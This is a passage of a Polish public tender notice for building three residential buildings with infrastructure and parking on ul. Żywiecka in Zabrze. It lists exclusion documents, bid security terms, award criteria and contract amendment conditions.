                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia  zostanie wezwany do złożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):
1. informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.  zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
5. oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; 
6. oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
7. w celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 24 ust. 1 pkt 23 ustawy, Wykonawca składa, stosownie do treści art. 24 ust. 11 ustawy (w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art. 86 ust. 5 ustawy), oświadczenie (załącznik nr 3 do SIWZ) o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu;
Uwaga! (odnosi się do wszystkich dokumentów na potwierdzenie braku podstaw wykluczenia):
W przypadku wykonawców wspólnie składających ofertę, dokumenty o których mowa wyżej zobowiązany jest złożyć każdy z wykonawców wspólnie składających ofertę.
Uwaga! (odnosi się do wszystkich oświadczeń i dokumentów):
1)Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub brak podstaw wykluczenia, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352),
2)w przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty,
3)dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski, w przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów na potwierdzenie braku podstaw wykluczenia lub spełniania warunków udziału w postępowaniu, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający żąda od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów,
4)w przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, które znajdują się w posiadaniu Zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez Zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy (brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego), korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania spełniania warunków udziału w postępowaniu, zostanie wezwany do przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):
w celu wykazania spełniania warunku Sytuacja ekonomiczna lub finansowa:
potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego;
informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
Uwaga! Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego dokumentów, o których mowa jw., Zamawiający dopuszcza złożenie przez wykonawcę innych dokumentów, o których mowa w art. 26 ust. 2c ustawy Pzp


w celu wykazania spełniania warunku Zdolność techniczna lub zawodowa:
wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone (wzór wykazu stanowi załącznik nr 4 do  SIWZ);

Uwaga! Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. 

wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 5 do  SIWZ).

Uwaga! (odnosi się do wszystkich oświadczeń i dokumentów):
1)Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub brak podstaw wykluczenia, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352),
2)w przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty,
3)dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski, w przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów na potwierdzenie braku podstaw wykluczenia lub spełniania warunków udziału w postępowaniu, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający żąda od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów,
4)w przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, które znajdują się w posiadaniu Zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez Zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy (brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego), korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do oferty należy dołączyć:
1.Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - na formularzu oferty  zgodnie z załącznikiem nr 1 do SIWZ.
2.Dokumenty innych podmiotów dotyczących oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp.
3.Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
4.Dowód wniesienia wadium:
w przypadku wniesienia wadium w postaci niepieniężnej, można je złożyć łącznie z ofertą (ale w oddzielnej kopercie, nie było na stałe związane/połączone z ofertą) lub złożyć w sekretariacie w siedzibie Zamawiającego ul. Towarowa 1, pokój nr 203 (sekretariat czynny od poniedziałku do piątku w godzinach od 7.00 do 15.00). Kserokopię tych dokumentów można dołączyć do oferty.
w przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu. 
w przypadku załączenia do oferty innych materiałów niż wymagane przez Zamawiającego (np. materiałów reklamowych czy informacyjnych itp.) pożądane jest, aby stanowiły one odrębną część niezłączoną z ofertą w sposób trwały. Materiały takie nie będą podlegały ocenie przez Zamawiającego.
5.Spis wszystkich załączonych dokumentów (spis treści)  zalecane, nie wymagane.
6.Kosztorys ofertowy, sporządzony w formie szczegółowej dla robót stanowiących przedmiot zamówienia.  Przez szczegółowy kosztorys ofertowy należy rozumieć kosztorys ofertowy sporządzony zgodnie z zasadami wynikającymi z rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 13.07.2001 r. w sprawie kosztorysowania obiektów i robót budowlanych, dla metody szczegółowej sporządzania kosztorysu ofertowego. Rozporządzenie nie jest aktem prawnym aktualnie obowiązującym, niemniej jednak Zamawiający wymaga sporządzenia szczegółowego kosztorysu ofertowego zgodnie z zasadami opisanymi w wyżej wskazanym rozporządzeniu. W przypadku stwierdzenia przez Wykonawcę braku możliwości skatalogowania danej pozycji kosztorysu, Wykonawca winien dokonać wyceny danego elementu przedmiaru robót w szczegółowym kosztorysie ofertowym na podstawie kalkulacji własnej (indywidualnej), którą winien załączyć do szczegółowego kosztorysu ofertowego jako jego integralną część. Szczegółowy kosztorys ofertowy winien zostać podpisany przez Wykonawcę i winien zostać załączony do formularza oferty w dwóch jednobrzmiących egzemplarzach (w przypadku zawarcia umowy z Wykonawcą, jeden egzemplarz zostanie wykorzystany na potrzeby realizacji przyszłej umowy  egzemplarza tego nie należy trwale łączyć z pozostałymi dokumentami oferty).
7.Podsumowanie w formie wykazu poszczególnych działów kosztorysu ofertowego z uwzględnieniem kwoty netto, kwoty brutto i zastosowanej stawki podatku VAT przy każdym dziale.
8.Harmonogram rzeczowo-finansowy inwestycji.

-----------------------------------------------------------------------------------------------Dokumenty składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. III.4) niniejszego ogłoszenia:
1)pkt 1. - składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21;
2)pkt 2. - 4. - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.

2. Dokumenty, o których mowa w ust. 1. pkt 1) i pkt 2) lit. b)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 1. pkt 2) lit. a), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 1.  zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Postanowienia pkt 2. stosuje się.
4. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w ust. III.4) pkt. 1 niniejszego ogłoszenia, składa dokument, o którym mowa w ust. 1. pkt 1), w zakresie określonym w art. 24 ust. 1 pkt 14 i 21. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Postanowienia ust. 2. zdanie pierwsze stosuje się.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Oferta musi być zabezpieczona wadium w wysokości:
a)w przypadku ubiegania się o Część I zamówienia w wysokości: 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100)
b)w przypadku ubiegania się o Część II zamówienia w wysokości: 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100)
Wykonawca składający ofertę na obie części wnosi wadium wynikające z sumy wyżej wymienionych kwot wadium.
2. Wadium musi obejmować cały okres związania ofertą. 
3. Termin wniesienia wadium upływa dnia 16.03.2017 r. do godz. 10:00
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
w pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz.275 z późn.zm.).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego  ING Bank Śląski o/Tarnowskie Góry. 87 1050 1386 1000 0002 0085 6060 z dopiskiem Wadium Budowa trzech budynków z wraz z infrastrukturą i parkingiem przy ul. Żywieckiej  w Zabrzu  Część/ci nr .. [należy wpisać Część lub Części o które Wykonawca będzie się ubiegał]. Kserokopię dowodu wpłaty można dołączyć do oferty.
6. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia Wykonawcy:
a) ustalać beneficjenta gwarancji, tj. Międzygminne Towarzystwo Budownictwa Społecznego,
b) określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
c) określać termin ważności (wynikający z SIWZ),
d) określać przedmiot gwarancji  (wynikający z SIWZ),
e) być gwarancją nie odwoływalną, bezwarunkową, płatną na pierwsze żądanie
7. Zamawiający zatrzyma wadium wraz z odsetkami:
a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,
b) jeżeli wykonawca, którego oferta została wybrana: 
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
8. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego.
9. Zamawiający zwróci wniesione wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 7. lit. a).
10. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli  w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez Zamawiającego.
11. Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>90</td></tr><tr><td>Okres gwarancji/rękojmi</td><td>5</td></tr><tr><td>Termin wykonania</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana umowy może także nastąpić w przypadkach, o których mowa  w art. 144 ust. 1 pkt 2-6 ustawy Pzp.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy.
